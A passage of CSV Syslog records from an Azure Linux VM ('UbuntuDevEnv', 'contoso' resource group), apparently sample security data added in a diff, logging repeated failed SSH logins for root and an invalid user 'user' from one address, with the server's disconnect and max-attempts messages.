+1854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:32,UbuntuDevEnv,2019-06-28 05:02:32,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 64580: Too many authentication failures [preauth],90148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,64580,,
+1855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:37,UbuntuDevEnv,2019-06-28 05:02:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,90213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:38,UbuntuDevEnv,2019-06-28 05:02:38,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 44998 ssh2,90213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,44998,,
+1857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:46,UbuntuDevEnv,2019-06-28 05:02:45,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 193.201.224.232 port 44998 ssh2],90213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,44998,,
+1858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:48,UbuntuDevEnv,2019-06-28 05:02:48,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 44998 ssh2,90213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,44998,,
+1859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:50,UbuntuDevEnv,2019-06-28 05:02:49,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 44998 ssh2,90213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,44998,,
+1860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:50,UbuntuDevEnv,2019-06-28 05:02:49,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,90213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:50,UbuntuDevEnv,2019-06-28 05:02:49,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,90213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:50,UbuntuDevEnv,2019-06-28 05:02:49,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 44998: Too many authentication failures [preauth],90213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,44998,,
+1863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:02:50,UbuntuDevEnv,2019-06-28 05:02:49,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 44998 ssh2 [preauth],90213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,44998,,
+1864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:08,UbuntuDevEnv,2019-06-28 05:03:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,90403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:10,UbuntuDevEnv,2019-06-28 05:03:10,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 20928 ssh2,90403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,20928,,
+1866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:28,UbuntuDevEnv,2019-06-28 05:03:27,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 20928 ssh2 [preauth],90403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,20928,,
+1867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:28,UbuntuDevEnv,2019-06-28 05:03:27,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,90403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:28,UbuntuDevEnv,2019-06-28 05:03:27,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 193.201.224.232 port 20928 ssh2],90403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,20928,,
+1869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:28,UbuntuDevEnv,2019-06-28 05:03:27,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 20928: Too many authentication failures [preauth],90403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,20928,,
+1870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:28,UbuntuDevEnv,2019-06-28 05:03:27,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,90403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:34,UbuntuDevEnv,2019-06-28 05:03:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,90502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:37,UbuntuDevEnv,2019-06-28 05:03:36,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 5318 ssh2,90502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,5318,,
+1873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:47,UbuntuDevEnv,2019-06-28 05:03:46,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,90502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:47,UbuntuDevEnv,2019-06-28 05:03:46,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,90502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:47,UbuntuDevEnv,2019-06-28 05:03:46,auth,UbuntuDevEnv,info,"Disconnecting authenticating user root 193.201.224.232 port 5318: Change of username or service not allowed: (root,ssh-connection) -> (user,ssh-connection) [preauth]",90502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,193.201.224.2,5318,,
+1876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:47,UbuntuDevEnv,2019-06-28 05:03:46,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 193.201.224.232 port 5318 ssh2],90502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,5318,,
+1877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:47,UbuntuDevEnv,2019-06-28 05:03:47,auth,UbuntuDevEnv,info,Invalid user user from 193.201.224.232 port 45110,90546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,45110,,
+1878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:47,UbuntuDevEnv,2019-06-28 05:03:47,auth,UbuntuDevEnv,info,Failed none for invalid user user from 193.201.224.232 port 45110 ssh2,90546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,45110,,
+1879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:47,UbuntuDevEnv,2019-06-28 05:03:47,auth,UbuntuDevEnv,info,"Disconnecting invalid user user 193.201.224.232 port 45110: Change of username or service not allowed: (user,ssh-connection) -> (User,ssh-connection) [preauth]",90546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,45110,,
+1880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:48,UbuntuDevEnv,2019-06-28 05:03:48,auth,UbuntuDevEnv,info,Invalid user User from 193.201.224.232 port 45907,90555,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,User,193.201.224.2,45907,,
+1881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:49,UbuntuDevEnv,2019-06-28 05:03:48,auth,UbuntuDevEnv,info,Failed none for invalid user User from 193.201.224.232 port 45907 ssh2,90555,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,User,193.201.224.2,45907,,
+1882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:49,UbuntuDevEnv,2019-06-28 05:03:48,auth,UbuntuDevEnv,info,"Disconnecting invalid user User 193.201.224.232 port 45907: Change of username or service not allowed: (User,ssh-connection) -> (user,ssh-connection) [preauth]",90555,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,User,193.201.224.2,45907,,
+1883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:52,UbuntuDevEnv,2019-06-28 05:03:51,auth,UbuntuDevEnv,info,Invalid user user from 193.201.224.232 port 46669,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,46669,,
+1884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:52,UbuntuDevEnv,2019-06-28 05:03:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:52,UbuntuDevEnv,2019-06-28 05:03:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:54,UbuntuDevEnv,2019-06-28 05:03:54,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 46669 ssh2,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,46669,,
+1887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:55,UbuntuDevEnv,2019-06-28 05:03:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:57,UbuntuDevEnv,2019-06-28 05:03:57,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 46669 ssh2,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,46669,,
+1889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:57,UbuntuDevEnv,2019-06-28 05:03:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:59,UbuntuDevEnv,2019-06-28 05:03:59,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 46669 ssh2,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,46669,,
+1891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:03:59,UbuntuDevEnv,2019-06-28 05:03:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:02,UbuntuDevEnv,2019-06-28 05:04:02,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 46669 ssh2,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,46669,,
+1893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:02,UbuntuDevEnv,2019-06-28 05:04:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:04,UbuntuDevEnv,2019-06-28 05:04:04,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 46669 ssh2,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,46669,,
+1895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:04,UbuntuDevEnv,2019-06-28 05:04:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:07,UbuntuDevEnv,2019-06-28 05:04:06,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user user from 193.201.224.232 port 46669 ssh2 [preauth],90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,46669,,
+1897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:07,UbuntuDevEnv,2019-06-28 05:04:06,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 46669 ssh2,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,46669,,
+1898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:07,UbuntuDevEnv,2019-06-28 05:04:06,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:07,UbuntuDevEnv,2019-06-28 05:04:06,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:07,UbuntuDevEnv,2019-06-28 05:04:06,auth,UbuntuDevEnv,info,Disconnecting invalid user user 193.201.224.232 port 46669: Too many authentication failures [preauth],90559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,46669,,
+1901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:26,UbuntuDevEnv,2019-06-28 05:04:25,auth,UbuntuDevEnv,info,Invalid user user from 193.201.224.232 port 27861,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,27861,,
+1902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:26,UbuntuDevEnv,2019-06-28 05:04:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:26,UbuntuDevEnv,2019-06-28 05:04:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:28,UbuntuDevEnv,2019-06-28 05:04:27,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 27861 ssh2,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,27861,,
+1905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:28,UbuntuDevEnv,2019-06-28 05:04:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:30,UbuntuDevEnv,2019-06-28 05:04:30,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 27861 ssh2,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,27861,,
+1907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:31,UbuntuDevEnv,2019-06-28 05:04:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:33,UbuntuDevEnv,2019-06-28 05:04:33,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 27861 ssh2,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,27861,,
+1909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:33,UbuntuDevEnv,2019-06-28 05:04:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:36,UbuntuDevEnv,2019-06-28 05:04:35,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 27861 ssh2,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,27861,,
+1911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:38,UbuntuDevEnv,2019-06-28 05:04:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:39,UbuntuDevEnv,2019-06-28 05:04:39,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 27861 ssh2,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,27861,,
+1913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:42,UbuntuDevEnv,2019-06-28 05:04:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
